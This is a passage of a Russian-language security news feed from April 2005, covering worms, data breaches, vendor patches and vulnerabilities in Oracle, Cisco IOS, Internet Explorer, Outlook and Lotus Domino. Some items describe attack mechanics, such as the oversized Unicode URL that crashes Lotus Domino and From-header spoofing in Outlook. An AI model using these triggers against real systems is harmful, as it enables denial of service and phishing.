14/04/2005 11:32 Oracle снизошла до Eclipse и возглавит проект open source
Oracle организует проект на основе платформы open source Eclipse, цель которого — облегчить создание мощных Java-приложений. Компания объявила о своем намерении возглавить Eclipse-проект и внести в него ПО, совместимое с пакетом Oracle TopLink, которое упростит разработку базы данных. Руководители компании сообщили, что в течение года Oracle намерена создать коммерческие продукты на базе проекта Eclipse, распространяемые по лицензии open source Eclipse. ПО Eclipse составляет платформу, к которой подключаются компоненты от независимых разработчиков. С его помощью программист может комбинировать разные инструменты, такие как средства моделирования и редакторы, сохраняя единый пользовательский интерфейс. По словам директора Oracle по J2EE-инструментам Денниса Макнила, целью проекта, который возглавит Oracle, является пропаганда использования новых средств доступа к базам данных, которые встраиваются в серверное ПО Java. Кроме того, Eclipse-инициатива позволит Oracle наладить контакт с Java-программистами, которые используют популярную среду разработки Eclipse. В первом квартале будущего года выйдет обновленный стандарт серверного ПО Java 2 Enterprise Edition с усовершенствованиями в спецификации Enterprise Java Beans. Программисты используют Enterprise Java Beans для написания серверных программ, предназначенных для мощных бизнес-приложений. Например, разработчик может воспользоваться EJBs для написания кода обработки транзакций с извлечением информации из множества баз данных. Версия EJB 3.0, которая станет частью более крупного обновления J2EE 5.0, должна еще больше облегчить создание таких серверных Java-программ.
ZDNet

14/04/2005 11:18 Число пострадавших от кражи персональных данных граждан США существенно увеличилось
В ходе расследования утечки информации из базы данных американской компании Seisint, которая занимается продажей и распределением информации для различных видов документооборота, было выявлено, что под угрозой оказались персональные данные около 310 тысяч американских граждан вместо 32 тысяч, как сообщалось в начале марта, сообщает Associated Press. Seisint в августе была выкуплена американской консалтинговой компанией LexisNexis, которая, в свою очередь, входит в англо-голландский издательский холдинг Reed Elsevier. В процессе передачи дел новому владельцу было установлено, что с января 2003 года в базы данных Seisint около 60 раз проникали неизвестные лица, пользуясь идентификационными данными клиентов компании. Предположительно, это были хакеры, которые приникали в корпоративную сеть с целью хищения хранящихся там во множестве персональных данных жителей США. Подобные данные имеются в распоряжении фирмы согласно специфике ее деятельности - действуя по соответствующей лицензии, Seisint может использовать их в работе, в том числе продавать уполномоченным структурам. В частности, компания работает с проектом правительства США "Matrix", который создан в рамках антитеррористических мероприятий и содержит базу данных о миллионах граждан страны. Среди таких данных - домашние адреса, номера социального страхования, данные о водительских правах и другие сведения. Seisint подчеркивает, что хакеры не воровали у нее данные о кредитной истории, номера банковских карт и медицинские записи. При попадании персональной информации подобного рода в руки злоумышленников она может быть использована для совершения различного рода махинаций от чужого имени. Тем не менее, с ее помощью затруднительно организовать кражу денежных средств, так как для финансовых операций используется многоуровневая система защиты. Впервые об утечке в Seisint стало известно после того, как в отделение Seisint обратился клиент, который обнаружил, что на его имя был выписан посторонний платеж, который он не совершал.
Lenta.Ru

14/04/2005 10:56 В Интернете началась эпидемия вируса Mytob
Российская компания-производитель антивирусного ПО "Лаборатория Касперского" объявила об очередной эпидемии компьютерных вирусов. На этот раз атака исходит от вируса-"червя" Net-Worm.Win32.Mytob, который стремительно распространяется за счет многочисленных модификаций. Один из вариантов Mytob лидирует по показателям активности на протяжении последних трех недель, занимая около 30 процентов всего вирусного почтового трафика. В настоящее время черви этого семейства представлены в составляемом компанией рейтинге двадцати наиболее распространенных вирусов 5-6 вариантами. Mytob создан на основе знаменитого почтового червя Mydoom, вызвавшего несколько эпидемий. Он заражает компьютеры под управлением Windows, на которых не установлены последние обновления системы безопасности от Microsoft, ликвидирующие уязвимость в механизме LSASS. Традиционно он приходит в виде письма с бессмысленным заголовком и текстом и с исполняемым файлом в качестве приложения. После заражения червь внедряется в систему и рассылает свои копии по почте по найденным на компьютере адресам, а также пытается проникнуть в незащищенные компьютеры, выборочно сканируя участки Интернета. Он традиционно содержит механизм, позволяющий разославшим его хакерам получить полный контроль над зараженной машиной. Накануне компания Microsoft выпустила очередной пакет обновлений для своего ПО, в том числе имеющих статус "критических". В "Лаборатории Касперского" отмечают, что пользователям необходимо обязательно установить эти обновления, так как вновь найденные "дыры" могут вызвать новые эпидемии в случае появления вирусов, которые их используют.
"Лаборатория Касперского"

13/04/2005 18:08 Уязвимость в OpenOffice.org
В OpenOffice.org версий 1.1.4 и более ранних (а также 2.0 Beta и более ранних, если речь идет о ветви 2.0), была обнаружена ошибка переполнения кучи в методе StgCompObjStream::Load(), сообщает linux.org.ru. Используя специально подготовленный .doc-файл, злоумышленник может скомпрометировать уязвимую систему. Исправление последует в ближайшие несколько дней.
Подробности

13/04/2005 15:37 Уязвимости в Cisco IOS
Cisco подготовила заплатки для двух уязвимостей в операционной системе IOS. Первая из брешей позволяет путем отправки специального пакета на маршрутизатор, работающий также в качестве VPN-концентратора, получить несанкционированный доступ к сети. Брешь имеется в устройствах с активным сервисом Easy VPN Server XAUTH версии 6. Атакующий, отправив на открытый порт UDP 500 некорректный пакет, может заставить маршрутизатор авторизовать в сети нелегального пользователя. Вторая уязвимость касается маршрутизаторов и любых устройств на базе IOS, на которых в целях удаленного управления запущен сервер SSH версии 2; при определенных условиях атакующий может отправить ему команды, которые вызовут утечку памяти, истощение ресурсов устройства и, как следствие, его перезагрузку.
"Открытые системы"

13/04/2005 14:52 Эксплоит уязвимости в Internet Explorer
На сайте security.nnov.ru опубликован эксплоит для браузера Internet Explorer. Уязвимость связана с повреждением памяти, выделяемой процессу, которое происходит при обработке специальным образом сформированного DHTML-объекта. Детали уязвимости и патч для её устранения опубликованы в вышедшем на днях бюллетене от Microsoft MS05-20 (кумулятивное обновление для Internet Explorer).
Эксплоит

13/04/2005 12:39 Многочисленные уязвимости в Oracle
David Litchfield из NGSSoftware cообщает о множественных уязвимостях в популярной СУБД Oracle. Уязвимости подвержены следующие версии: Oracle Database 10g Release 1 Version 10.1.0.2, 10.1.0.3, 10.1.0.3.1 and 10.1.0.4; Oracle9i Database Server Release 2, versions 9.2.0.5 and 9.2.0.6; Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4; Oracle8i Database Server Release 3, version 8.1.7.4. Детали уязвимостей пока не разглашаются и будут опубликованы, согласно политики NGSSoftware, 12 июля 2005 г. Однако, согласно информации SecurityLab, уязвимости присутствуют в следующих компонентах и службах: Change Data Capture, Data Pump, Intermedia, Authentication, Database SSL Library, Internet Directory, Spatial, XML Database, XDK, HTML database. Удаленный пользователь может получить доступ к базе данных, изменить информацию и вызвать отказ в обслуживании. Там же приводится пример эксплоита, написанного Esteban Martinez Fayo для версии Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4. На сайте производителя (http://metalink.oracle.com/) опубликованы патчи.
Описание
Эксплоит

13/04/2005 11:33 Cерия критических патчей от Microsoft
Как и было обещано, вчера Microsoft выпустила очередную серию патчей для семейтва своего ПО. Напомним, что корпорация решила в марте "отдохнуть" и не выпустила ставшие традиционными исправления. Выпущены 5 критических бюллетеней (MS05-019 - MS05-023) и три важных - MS05-016 - MS05-18. Первая проблема связана с компонентом Windows Shell и теоретически может использоваться злоумышленниками для выполнения произвольного программного кода на удаленном компьютере. Для реализации нападения необходимо вынудить жертву загрузить сформированный особым образом файл с расширением .hta. Обработка такого файла вызовет сбой в модуле mshta.exe и спровоцирует последующее выполнение вредоносных операций. Брешь, охарактеризованная как важная, присутствует в Windows 2000, Windows ХР (в том числе со вторым сервис-паком) и Windows Server 2003. Кроме того, вредоносный код может быть выполнен на машине-жертве через дыру в компоненте Microsoft Message Queuing (MSMQ) с использованием сконструированного специальным образом запроса. Данная уязвимость также получила рейтинг важной и присутствует в операционных системах Windows 2000 и Windows ХР с первым сервис-паком. Более подробно об ошибке можно прочитать в бюллетене безопасности MS05-017. Несколько уязвимостей найдены в ядрах Windows 98/ME/2000/XP/Server 2003. Дыры могут эксплуатироваться злоумышленниками с целью несанкционированного повышения уровня собственных привилегий на компьютере. Проблемы связаны с некорректной обработкой определенных файлов шрифтов, команд доступа, а также с ошибкой в системе CSRSS (Client Server Runtime System). Правда, для организации атаки нападающему необходимо вначале получить доступ к машине-жертве. Дыры получили статус важных. Наконец, критическая дыра обнаружена в реализации протокола TCP/IP в операционных системах Windows 2000, Windows ХР (в том числе со вторым сервис-паком) и Windows Server 2003. Направив жертве сформированный особым образом ICMP-пакет (Internet Control Message Protocol) или IP-пакет, нападающий может выполнить на удаленном компьютере произвольные деструктивные операции или спровоцировать DoS-атаку. Подробную информацию о дыре можно найти в бюллетене MS05-019. Заплатки для всех уязвимостей уже выпущены и доступны для загрузки на веб-сайте корпорации Microsoft.
Апрельские обновления от Microsoft

13/04/2005 11:20 Отчет: раздражение по отношению к спаму притупляется
Сегодня явление спама находят раздражающим или неприятным меньше людей, чем год назад, — на это указывает исследование, проведенное организацией Pew Internet and American Life Project. Сегодня только 67% пользователей e-mail говорят, что спам мешает их работе в онлайне, вместо 77% год назад. К тому же восстанавливается доверие людей к e-mail: 53% респондентов сказали, что спам ослабляет их доверие к электронной почте, тогда как год назад таких было 62%. Проект Pew Internet and American Life изучает отношение пользователей e-mail к спаму последние два года. Исследователи уверены, что негативная реакция достигла пика примерно год назад и теперь пойдет на спад или будет сохраняться на том же уровне. «Эти результаты предполагают, что по крайней мере сейчас наихудший сценарий — когда спам серьезно подрывает или даже прерывает работу электронной почты — не реализуется, и что пользователи привыкают к допустимому для них уровню дискомфорта, вносимого спамом», — говорится в отчете. Меньше всего спам беспокоит молодых людей в возрасте от 18 до 24 лет, и они с наименьшей вероятностью прекратят пользоваться e-mail из-за спама. Несмотря на все более спокойную реакцию на спам, нельзя сбрасывать со счетов влияние массы непрошеных электронных сообщений на поведение в онлайне. «Спам остается относительно важной проблемой для пользователей интернета, — пишут авторы отчета. — Более половины из них, 52%, считает эту проблему серьезной. Пользователи относятся к спаму более негативно, чем к другим проблемам интернета», таким как шпионское ПО.
Отчёт в PDF

13/04/2005 10:17 В ПО Microsoft найдена неисправленная ошибка
Microsoft изучает сообщение об ошибке, которая делает уязвимыми к атакам системы с приложениями Access и Office. Баг, не вошедший в число восьми исправленных в патче, который Microsoft разослала во вторник в рамках очередной рассылки исправлений для Windows, согласно рекомендации, опубликованной в тот же день секьюрити-фирмой Secunia, кроется в механизме базы данных Jet. Он позволяет злоумышленнику дистанционно исполнять на уязвимом ПК произвольный код. Microsoft не подтвердила существование уязвимости, однако Secunia оценивает проблему как «высоко критичную», отмечая, что код эксплойта для нее уже распространяется в открытых списках почтовой рассылки. «Она вызвана ошибкой управления памятью при анализе файлов базы данных, — говорится в рекомендации Secunia. — Эту уязвимость можно использовать для исполнения произвольного кода, если пользователь откроет в Microsoft Access специально созданный файл .mdb». Во вторник представитель Microsoft сообщил, что компании не известно о каких-либо атаках на системы заказчиков с использованием не устраненного пробела в защите. «Мы знаем о выпущенном эксплойте, — сказал он, добавив, что компания примет необходимые меры, как только завершит исследование проблемы. Secunia отмечает, что первое сообщение об этой ошибке поступило от секьюрити-фирмы HexView. В продолжение споров о том, когда и каким образом специаисты, обнаружившие уязвимости, должны обнародовать их, Microsoft критикует исследователей: зачем они предали свою находку гласности, вместо того, чтобы тайно обратиться к производителю ПО и дать ему возможность заранее подготовить патч? «Очень жаль, что они решили опубликовать эту информацию», — сказал представитель Microsoft. В рекомендации HexView говорится, что компания предупредила Microsoft об ошибке 30 марта, но ответа не получила. По словам представителя Microsoft, компания не зафиксировала никакого обращения из HexView до публикации информации.
Подробности

12/04/2005 13:11 Электромонтер оштрафован на 400 рублей за хакерство и разглашение чужих адресов
Прокуратура Приокского района Нижнего Новгорода привлекла местного жителя - сотрудника ОАО "Молочный комбинат "Нижегородский" (входит в группу "Вимм-Билль-Данн") Леонида Горбунова - к административной ответственности за разглашение личных данных и размеров зарплаты работников своего предприятия через Интернет. Как сообщает "Нижегородское телеграфное агентство", Горбунов работал на предприятии электромонтером связи пятого разряда. Установлено, что в марте он "при помощи программы подбора паролей" несанкционированно взломал компьютерную сеть комбината и скопировал оттуда персональные данные всех сотрудников, в том числе домашние адреса, телефоны, даты приема на работу, размеры заработной платы и должности. Эти данные он разместил на созданном им собственном сайте, который получил название "Виртуальный профсоюз". Горбунов утверждает, что создал этот сайт не из каких-либо корыстных побуждений, а "из любопытства". Как отмечает заместитель прокурора Приокского района Светлана Марченкова, особенное внимание он уделил зарплатам директоров предприятия - так, согласно полученным данным, финансовый директор ОАО получает в месяц 700 тысяч рублей, исполнительный директор 500 тысяч рублей, а директор производства 400 тысяч рублей в месяц. Отмечается, что зарплата Горбунова составляла 6 тысяч рублей в месяц. Сайт был обнаружен сотрудниками службы безопасности комбината, после чего прокуратура установила его автора. В отношении Горбунова было возбуждено дело об административном правонарушении. Как поясняют в прокуратуре, в силу статьи 2 Федерального закона "Об информации, информатизации и защите информации" персональные данные представляют собой сведения о фактах, событиях и обстоятельствах жизни гражданина, позволяющие идентифицировать его личность. В соответствии со статьей 23 Конституции РФ, каждый гражданин имеет право на "неприкосновенность частной жизни, личную, семейную тайну, тайну переписки, телеграфных, почтовых телефонных и иных сообщений". Таким образом, в действиях Горбунова были выявлены признаки административного правонарушения, предусмотренного статьей 13.11 Кодекса об административных правонарушениях - "нарушение установленного законом порядка, сбора, хранения, использования или распространения информации о гражданах", - заявили в прокуратуре. В итоге Леониду Горбунову был выписан штраф в размере 400 рублей. Светлана Марченкова отметила, что подобное дело - первое за последние пять лет. "Если такие преступления совершаются, то они - единичны не только в Нижнем Новгороде, но и в России", - подчеркивает Марченкова.
Lenta.Ru

12/04/2005 10:42 С Днём Космонавтики!
Администрация сайта UINC поздравляет всех причастных и просто патриотов великого государства, которое зовётся Россия, с Днём Космонавтики! Это наш праздник! Праздник великой страны, показавшей "кузькину мать" второй великой "державе", которая обладала бОльшими финансовыми да и интеллектуальными возможностями. Праздник, который до сих пор показывает, что мы хотя бы не всё продали и пропили в нынешнее неспокойное время. Спорный праздник, если вспомнить, что та же самая великая держава продала всю технологию МКС господам из НАСА за цену, намного меньшую их НИОКР на разработку новой орбитальной станции. Но это праздник людей, которые честно отдают свою жизнь делу космонавтики. Тех неведомым для широкого круга лиц инструкторов, которые готовят космонавтов, тех, неведомым тому же кругу начальникам тренажёров, отделов. Тех простых инженеров в погонах, которые летают в Ленинск, называемом в народе Байконуром. Специалистов из РГНИИЦПК им. Ю.А.Гагарина, специалистов из РКК "Энергия", специалистов из ЦНИИМАШ (ЦУП), специалистов стартовых команд из ВКС России, специалистов ИМБП. Простых незаметных людей, благодаря работе которых космонавтика всё продолжает держаться! С праздником вас всех, мужики!
Команда UINC

11/04/2005 14:35 Запорожский хакер взломал банковскую систему
На сайте crime-research.ru опубликована довольно занимательная статья о хакере из украинского (если кто не знает) города Запорожье, который, будучи несправедливо уволенным и досконально зная банковскую систему "Клиент-Банк", постоянно влазил в эту систему. Потом решил пошутить, оформив "левую" платёжку на крупную сумму денег, намеренно сделав в ней несколько ошибок. Однако, к удивлению парня, платёжка была проведена банком на несуществующую фирму-банкрот. В итоге хакер был обвинён в совершении преступления по ч.2 статьи 361 Уголовного кодекса Украины - незаконное вмешательство в работу компьютерных систем с нанесением вреда и по ч.5 статьи 185 - кража, совершенная в особо крупных размерах. Но так как деньги были возвращены владельцу, а компьютерная система получила минимальные повреждения, руководство банка отказалось от каких-либо претензий. Статью за кражу с парня сняли, а часть 2 статьи 361 поменяли на часть 1 - незаконное вмешательство в работу компьютерных систем. Как пишет crime-research.ru, "Это преступление довольно необычное. Во-первых, потому, что данный вид правонарушений появился совсем недавно. Речь идет о хакерстве - компьютерных преступлениях. А, во-вторых, преступник сознательно хотел, чтобы его заметили..." Одно непонятно во всей этой статье. В начале Crime-Research называет хакера Станислав Л., а в конце уже Станиславом С....
Cтатья

11/04/2005 13:28 Новый троянец уничтожает смартфоны
Появился новый троянец для смартфонов на платформе Symbian Series 60. Несмотря на пока что малую распространенность, новый вирус чрезвычайно опасен, утверждают специалисты. О появлении нового троянца, выводящего из строя смартфоны, предупреждает компания F-Secure. Несмотря на растущую обеспокоенность специалистов последствиями распространения потенциально очень опасных вирусов, поражающих мобильные устройства, пока что случаи заражения ими редки. Как сообщает Silicon.com, финская компания впервые обнародовала подробности о новом вирусе, получившем обозначение Fontal.A, в среду, 6 апреля. Fontal.A поражает телефоны Nokia, выполненные на базе платформы Series 60 с операционной системой Symbian. Распространяется он, в отличие от появившегося ранее троянца CommWarrior, не через Bluetooth или MMS, а при обмене файлами либо через IRC. Fontal.A пытается инсталлировать в инфицированное устройство файл с именем «Kill Saddam By OID500.sis». В случае его инсталляции смартфон выйдет из строя при первой же перезагрузке и будет оставаться неработоспособным вплоть до дезинфекции. Помимо этого, троянец также повреждает менеджер приложений, препятствуя тем самым установке новых программ, а также деинсталляции самого троянца. Единственный метод лечения – переформатирование телефона с подразумевающейся при этом безвозвратной потерей всех данных. Пока что пользователям рекомендовано в целях профилактики Fontal.A и других троянцев загружать файлы только из абсолютно надежных источников
"Компьюлента"

11/04/2005 12:39 ICANN окончательно одобрила новые домены .jobs и .travel
Организация по распределению имен и номеров в Интернете (ICANN) окончательно утвердила новые доменные имена верхнего уровня .jobs и .travel, сообщает Associated Press. .jobs предназначается для сайтов, связанных с трудоустройством, .travel - для туристических сайтов. Новые домены расширяют адресное пространство в Интернете, размещение сайтов в тематических доменах позволяет легче их категоризировать. Кроме того, для получения имени в "профессиональном" домене обычно требуется наличие документов, подтверждающих легитимность работы организации в той или иной сфере деятельности - таким образом, по доменому имени постетители могут убедиться, что тот или иной сайт предоставляет свои услуги на законном основании. Сейчас в Интернете уже работают такие "профессиональные" домены, как .aero (для авиакомпаний) и .museum (для музеев). После утверждения двух новых доменов в ICANN операторы новых зон будут разрабатывать процедуру регистрации и проводить техническую подготовку. Прежде чем зоны заработают, может пройти несколько месяцев. В настоящее время ICANN также рассматривает возможность учреждения доменов .post (для почтовых организаций) и .mobi (для бизнесов, связанных с мобильной связью), но решение по ним пока не принято.
Источник

11/04/2005 11:54 Недельный отчет о вирусах и вторжениях Panda Software
Опубликоан традиционный недельный отчёт вирусной активности прошедшей недели от компании Panda Software. В отчете рассмотрены версии червя Mytob (S, U, V и W), новая версию вируса, заражающего сотовые телефоны, и новый вид онлайнового мошенничества.
Отчёт

11/04/2005 11:29 Сетевая общественность устроила "митинг" в жж фантаста Геворкяна
Возмущенные пользователи Livejournal "зафлудили" сетевой дневник фантаста Эдуарда Геворкяна, который отсудил у Максима Мошкова, владельца знаменитой сетевой библиотеки lib.ru, сто долларов. В апреле прошлого года "КМ онлайн" организовала подачу исков против сетевых библиотек от имени писателей Александры Марининой, Василия Головачева, Эдуарда Геворкяна и Елены Катасоновой. "КМ онлайн" тоже владеет сетевой библиотекой, однако за доступ к ней она берет с пользователей плату. Иски вызвали бурную негативную реакцию сетевого сообщества, но она ничуть не смутила "КМ онлайн", как и то, что "защищаемые" писатели стояли на стороне, скорее, Мошкова, чем выступающей от их имени компании. Упорствовал только Геворкян, хотя его книг в lib.ru уже не было. В конце марта 2005 года, спустя почти год после подачи иска, Останкинский суд Москвы вынес решение по иску писателя Эдуарда Геворкяна к владельцу библиотеки www.lib.ru: Максиму Мошкову придется выплатить 3000 рублей в качестве компенсации. Реакция общественности не заставила себя ждать. В сетевом дневнике, который Геворкян ведёт в Livejournal, сотни возмущенных (среди них - несколько известных рунетовских деятелей) оставили комментарий с такими словами "Поместите, пожалуйста, кусочек текста из Вашей книги, а то я не знаю покупать или не покупать". Вопрос о "кусочке текста из Вашей книжки" - риторический. Сама новая книга Геворкяна собого интереса ни у кого не вызывает, говорит креативный директор сайта Публикант.Ру Александр Ройфе, равно как и то, что суд-таки выявил факт нарушения авторского права и текст его книги "Правила игры без правил" (очень неплохой, по мнению Александра) был удален из библиотеки Мошкова. Произошедшее в жж Геворкяна можно считать своего рода митингом протеста. Другие полагают, что это больше похоже на сетевое хулиганство и травлю. Максим Мошков призвал своих сторонников не участвовать в этой акции. Журналист и литературный критик Борис Львин сочувствует Максиму Мошкову: "Создание lib.ru - важнейшее достижение Рунета, а разрушение ее - низкое дело, удар по отечественной культуре". Если ему вдруг придет в голову почитать Геворкяна, он зайдет на http://web.archive.org/web/*/http://www.lib.ru и без труда найдет все то, на чем писатель заработал сто долларов, с издевкой добавил он.
Сетевой дневник Геворкяна

11/04/2005 10:55 Леонид Рейман: мы не хуже жителей "Силиконовой долины"
Россия обладает достаточными интеллектуальными ресурсами для создания альтернативы «Силиконовой долине», сообщает РБК. Об этом сегодня журналистам в Ганновере заявил министр связи и информационных технологий РФ Леонид Рейман. Он подчеркнул, что в России сохраняется достаточно хороший уровень профессиональной подготовки. В частности, выпускники российских вузов могут применять свои знания в точных науках для продвижения высокоинтеллектуальных технологий. Г-н Рейман подчеркнул, что сейчас необходимо создавать условия для того, чтобы эти специалисты, высоковостребованные сейчас за рубежом, оставались в России и применяли тут свой опыт. По словам министра, важным фактом является то, что немецкая компания Siemens сейчас участвует в ряде проектов, способствующих сохранению этого интеллектуального базиса в России. Леонид Рейман считает, что сейчас Россия может ориентироваться на исторически существующие научные центры для увеличения этого потенциала, которые действуют, например, в Новосибирске, Москве, Санкт-Петербурге и т.д. Министр привел телемедицину в качестве примера одного из направлений в области информационных технологий, в которых Россия может стать экспортером своих научных и технологических решений. От себя - да, конечно, мы не хуже шведов, немцев, американцев. Но вот живём почему-то значительно хуже. Может господам из правительства и Думы стоит всё-таки начать с себя любимых? Хотя верится в это с трудом.
РБК

11/04/2005 10:11 Linux дороже Windows? Спор продолжается
Аналитическая фирма утверждает, что Windows предлагает равную или лучшую ТСО по сравнению с Linux, однако по мнению компаний open source, проведенное исследование игнорирует некоторые преимущества Linux. Согласно опубликованному на прошлой неделе отчету, большинство предприятий, внедряющих Microsoft Windows Server 2003, уверены, что по качеству, производительности и надежности она не хуже, а то и лучше, чем Linux. Однако компании open source не согласны с этим и уверяют, что есть области, в которых Linux превосходит Windows. Автор отчета, аналитик Yankee Group Лаура Дидио, сказала ZDNet UK, что это миф, будто общая стоимость владения (ТСО) Linux ниже, чем у Windows. «Последние три года твердят: „Linux гораздо дешевле, чем Windows”. — В некоторых случаях это справедливо, но в целом этого утверждать нельзя». Дидио считает, что существенные расходы связаны с обслуживанием и поддержкой Linux, а также с переводом на Linux приложений независимых поставщиков. В отчете Linux-Windows 2005 TCO Comparison Survey утверждается, что системные администраторы могут восстановить Windows-сервер на 30% быстрее, чем Linux-сервер. Однако «в подавляющем большинстве случаев» это связано не с самой операционной системой, а с недостаточной документацией. Информацию по безопасности Windows найти легче, чем по Linux, так как вся она лежит в одном месте, утверждает Дидио. «Вокруг Linux сложилось раздробленное сообщество. Одна из проблем безопасности заключается в том, что очень мало обобщенных сайтов содержат перечень всех известных уязвимостей, охватывающий разные платформы и приложения. Инфраструктура Microsoft в этом плане лучше». В ходе опроса респондентам предлагали оценить Linux и Windows по ряду критериев по десятибалльной шкале. В целом Linux-серверы получили более высокую оценку за безопасность по сравнению с Windows-серверами: 8,3 против 7,6 у Windows Server 2003. Это значительно лучше по сравнению с прошлогодней оценкой, отмечает Дидио. «В прошлом году мы давали Microsoft большой-прибольшой черный шар за безопасность. Windows тогда набрала всего 3 балла из 10, а теперь 7,6 балла». Некоторые члены Linux-сообщества дали Дидио (DiDio) прозвище DiDiot и утверждают, что она несправедливо превозносит Microsoft. Аналитик парировала это заявление, отчитав «маргинальных фанатиков Linux» за нетерпимость и оскорбительное отношение к тем, кто с ними не согласен.
Более подробно

11/04/2005 09:57 Китайские компьютеры с индийским ПО поставят мир на колени
Сотрудничество Китая и Индии позволит им занять доминирующее положение в области высоких технологий. Как сообщает Associated Press, премьер КНР Вэнь Цзябао заявил, что для этого необходимо поставить на сделанное в Китае компьютерное оборудование индийское программное обеспечение. При посещении технологического центра в Бангалоре, премьер призвал обе нации забыть свое историческое соперничество, чтобы совместно работать над наступлением "азиатского столетия" в мире информационных технологий. Индия уже завоевала мировое признание своими программистами, а у Китая сильные позиции в производстве вычислительной техники. Наличие в обеих странах дешевой и многочисленной рабочей силы уже подорвало позиции технологических компаний в США и в других западных странах. Именно поэтому китайский лидер предложил индийцам сотрудничать, а не конкурировать. В понедельник состоятся переговоры Вэнь Цзябао с индийским премьер-министром Манмохан Снгхом, в ходе которых будут подписаны до 30 соглашений в области политического, экономического и культурного сотрудничества. В частности, планируется подписать документы, которые положат конец многолетнему пограничному конфликту между Индией и Китаем в Гималаях.
Lenta.Ru

10/04/2005 14:59 Уязвимости в E-mail клиентах Microsoft
Всё та же неутомимая cообщает об обнаружении уязвимости в почтовых клиентах корпорации Microsoft. На сей раз среди пострадавших отмечаются Microsoft Outlook (инсталлируется в составе Office XP/2003) и Outlook Web Access (OWA) (входит в Exchange 2003). Суть уязвимости заключается в том, что в этих клиентах некорректно интерпретируется поле почтоого заголовка "From:". Если в SMTP-заголовке будет несколько адресов в этом поле, разделённых запятыми, оба вышеозначенных клиента покажут только первый почтовый адрес. Сама уязивмость может быть использована для обмана почтовых фильтров корпоративных почтовых серверов, которые, в случае настройки приёма почты только от внутрикорпоративных почтовых клиентов, пропустят почту, которая на самом деле была послана снаружи (из Интернет). Подобная уязвимость может быть использована для фишинга, которые в последнее время приобретает всё больший размах. Microsoft сообщила, что не намерена включать патчи в ближайшие выпуски и, возможно, включит исправление в один из ближайших сервис-паков. Отрадно заметить, что уязвимость обнаружена нашим соотечественником Сергеем Гордейчиком.
Описание

10/04/2005 14:36 Великолепная пятерка и Билл Гейтс
Сразу пять известных игроков информационной отрасли -- Nokia, IBM, Oracle, Red Hat и RealNetworks -- заявили о готовности противостоять в суде американскому компьютерному гиганту Мicrosoft по антимонопольному делу. Как известно, Европейский суд осенью рассмотрит апелляцию компании Била Гейтса, которую признали монополистом, заставили раскрыть некоторые программные коды для конкурентов (чтобы их продукция стала совместимой с программами Microsoft), выпустить версию Windows XP без проигрывателя Windows Media Player и помимо прочего оштрафовали почти на полмиллиарда долларов. Крупнейшие IT-компании для выполнения своей антимонопольной миссии образовали Европейский комитет взаимодействующих систем (ECIS). Эта организация обратилась в суд с просьбой принять ее заявку на участие в разбирательстве. Между тем борцы за свободную конкуренцию пропустили срок подачи заявки на участие в слушаниях, и теперь процесс пройдет без их активного содействия. Но при оглашении своего решения комитет сразу заявил, что настроен очень серьезно: даже если суд отклонит выдвинутую инициативу, ECIS все равно будет оказывать всяческую помощь Еврокомиссии -- он собирается получить в деле статус «привилегированных партнеров», что позволит давать профессиональные комментарии по ходу слушаний. «Мы находимся в постоянном контакте с представителями отрасли и приветствуем любые отклики», -- заявил АР один из представителей ECIS. «Мнение Microsoft о том, что у Еврокомиссии нет никаких аргументов и она почти не имеет поддержки со стороны представителей индустрии, абсолютно ошибочно, -- считает один из брюссельских адвокатов ECIS Томас Виндж. -- В своих начинаниях Еврокомиссия не одинока и имеет твердую поддержку».
SecurityLab

10/04/2005 14:10 Уязвимость в Lotus Domino
iDEFENSE cообщает об обнаружении уязвимости в IBM Lotus Domino Server. Обнаружена в Вэб-сервиса этого сервера - в компоненте NLSCCSTR.DLL. Большое количество (приблизительно 330) символов в кодировке Unicode с кодом 430 в формируемом URL вида GET /cgi-bin/[xxx] HTTP/1.0 приводит к исчерпанию места в стеке. Таким образом, атакующий может провести DoS-атаку против Вэб-сервера под управлением Lotus Domino. Как указывает iDEFENSE, при этом никаких сообщений в терминале NSERVER не появляется, однако процесс nHTTP.exe прекращает свою работу. Уязвимость была обнаружена в версиях 6.5.1 и 6.03. Lotus Domino версии 6.5.3 уязвимости не подвержен. В выпущенном бюллетене #1202446 IBM сообщила, что не смогла воспроизвести уязвимость и поэтому не собирается выпускать патчи.
Подробности

10/04/2005 13:27 Реализация TCP/IP-cтека в MS Windows 2003
Как сообщает opennet.ru, на сайте Microsoft опубликован документ "Microsoft Windows Server 2003 TCP/IP Implementation Details", который описывает реализацию, особенности и возможности стека протоколов TCP/IP в MS Windows 2003. Кроме всего прочего, документ содержит достаточно большой список параметров для тюнинга сетевой подсистемы в Windows.
Документ

10/04/2005 13:04 Торвальдс ищет новый «дом» для ОС Linux
Линус Торвальдс (Linus Torvalds) начал поиски нового «дома» для исходного кода открытой операционной системы Linux после конфликта, возникшего с текущей системой управления — BitKeeper. По словам Торвальдса, переход на менее автоматизированную систему, основанную на электронной почте, может замедлить скорость разработки Linux, однако чем раньше начнется переход, тем будет лучше. Я решил отказаться от использования BK (BitKeeper) в основном из-за того, что нужно изучить альтернативы… посмотреть, на что похожа жизнь без BK», — сообщается в послании отца Linux. Однако Стэйси Квандт (Stacey Quandt), аналитик из Robert Frances Group, полагает, что больших проблем в связи с миграцией не возникнет: «Я не думаю, что это замедлит разработку, т.к. уже на сегодняшний день огромное число изменений эффективно осуществляется посредством e-mail». Причиной для перехода послужил конфликт между коммерческим программным обеспечением и open-source: BitKeeper не принадлежит к числу открытого ПО, и его использование Торвальдсом (начало которого приходится еще на 2002 год) вызывает множество критических отзывов со стороны поклонников open-source.
Nixp.Ru

10/04/2005 12:32 DoS на eTrust
Уязвимость в eTrust 3.0 (системе обнаружения атак, выпускаемой Computer Associates), делает ее открытой для DoS-атаки, сообщает bugtraq.ru. Проблема заключается в отсутствии проверки размера данных, передаваемых функции CPImportKey из CryptoAPI. Сама функция тоже не утруждает себе этой проверкой, что и приводит к переполнению буфера. Исправление уже выпущено.
Подробности

10/04/2005 12:00 Провайдеры будут сообща бороться с проблемами DDoS-атак
